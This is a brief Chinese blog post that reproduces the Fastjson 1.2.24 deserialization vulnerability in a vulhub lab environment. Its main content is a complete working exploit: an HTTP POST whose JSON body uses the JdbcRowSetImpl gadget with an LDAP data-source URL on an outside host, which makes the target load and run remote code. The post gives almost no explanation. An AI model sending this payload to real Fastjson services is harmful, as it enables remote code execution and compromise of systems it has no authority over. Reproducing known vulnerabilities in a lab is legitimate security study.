Fastjson-1.2.24漏洞复现

2022-09-26 19:20:44 浏览数 (3)

Fastjson-1.2.24漏洞复现

水一篇文章,昨天做了1.2.47的忘记了一个低版本的今天补上

配置所有我都没有变,同样使用的是vulhub来启动Fastjson环境

知识最后的Payload有所不同

Payload,访问Fastjson环境,然后替换包内容

代码语言:javascript复制
POST / HTTP/1.1
Host: 104.128.92.144:8090
Content-Type: application/json
Content-Length: 172

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://104.128.92.144:7777/Exploit",
        "autoCommit":true
    }
}

Q.E.D.

1 人点赞